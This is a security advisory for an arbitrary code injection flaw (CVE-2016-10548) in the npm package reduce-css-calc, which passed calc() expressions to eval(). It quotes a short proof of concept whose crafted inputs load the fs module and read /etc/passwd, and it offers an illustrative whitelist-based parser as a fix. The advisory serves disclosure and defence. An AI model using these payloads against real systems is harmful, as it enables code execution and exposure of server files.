Arbitrary Code Injection
Affecting reduce-css-calc package, versions <1.2.5
Overview
reduce-css-calc is a package that reduces CSS calc() expressions as far as possible. Affected versions of the package used eval() to evaluate the expression, allowing an attacker to gain arbitrary code execution via specially crafted input.
Example
The issue was reported by ChALkeR and is demonstrated in his example below:
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
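As an added illustration of the fix's principle (example code, not the package's own, and not a full replacement for reduce-css-calc, which keeps mixed-unit expressions such as 100% - 10px symbolic): a whitelist-based calc() reducer that parses the expression with a small grammar instead of handing it to eval(), so inputs like the ones above fail as illegal tokens instead of being executed.

```javascript
// Added example, not reduce-css-calc's own code: a whitelist-based calc()
// reducer. The tokeniser accepts only numbers (with optional unit), the four
// arithmetic operators and parentheses; anything else is rejected up front.
function tokenize(src) {
  const re = /(\d+(?:\.\d+)?)([a-z%]*)|([-+*\/()])/gy;
  const s = src.replace(/\s+/g, '');
  const tokens = [];
  for (let i = 0; i < s.length; i = re.lastIndex) {
    re.lastIndex = i;
    const m = re.exec(s);
    if (!m) throw new Error(`illegal token at offset ${i}: ${s.slice(i, i + 10)}`);
    tokens.push(m[1] !== undefined ? { value: parseFloat(m[1]), unit: m[2] } : { op: m[3] });
  }
  return tokens;
}

// Recursive descent: expr := term (('+'|'-') term)*, term := factor (('*'|'/') factor)*,
// factor := number | '(' expr ')' | '-' factor. Returns the reduced value as a string.
function reduceCalc(src) {
  const m = /^\s*calc\((.*)\)\s*$/.exec(src);
  if (!m) throw new Error('not a calc() expression');
  const toks = tokenize(m[1]);
  let pos = 0;
  const peekOp = (...ops) => (toks[pos] && ops.includes(toks[pos].op) ? toks[pos++].op : null);
  const binary = (next, ops, combine) => () => {
    let left = next();
    for (let op; (op = peekOp(...ops)); ) left = combine(op, left, next());
    return left;
  };
  function factor() {
    if (peekOp('-')) { const v = factor(); return { value: -v.value, unit: v.unit }; }
    if (peekOp('(')) { const v = expr(); if (!peekOp(')')) throw new Error('missing )'); return v; }
    const t = toks[pos++];
    if (!t || t.op !== undefined) throw new Error('expected a number');
    return t;
  }
  const term = binary(factor, ['*', '/'], (op, l, r) => {
    // A dimension may be scaled by a plain number, never multiplied/divided by another dimension.
    if (op === '*' ? l.unit && r.unit : r.unit || r.value === 0) throw new Error(`illegal ${op} operands`);
    return { value: op === '*' ? l.value * r.value : l.value / r.value, unit: l.unit || r.unit };
  });
  const expr = binary(term, ['+', '-'], (op, l, r) => {
    if (l.unit !== r.unit) throw new Error('cannot add different units'); // e.g. 100% - 10px
    return { value: op === '+' ? l.value + r.value : l.value - r.value, unit: l.unit };
  });
  const result = expr();
  if (pos !== toks.length) throw new Error('unexpected trailing tokens');
  return `${result.value}${result.unit}`;
}
```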
Remediation
Upgrade reduce-css-calc to version 1.2.5 or greater.
CVSS Score
6.1
medium severity
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Confidentiality: Low
- Integrity: Low
- Availability: None
- Credit: Сковорода Никита Андреевич (ChALkeR)
- CVE: CVE-2016-10548
- CWE: CWE-94
- Snyk ID: npm:reduce-css-calc:20160913
- Disclosed: 20 Aug, 2016
- Published: 17 Oct, 2016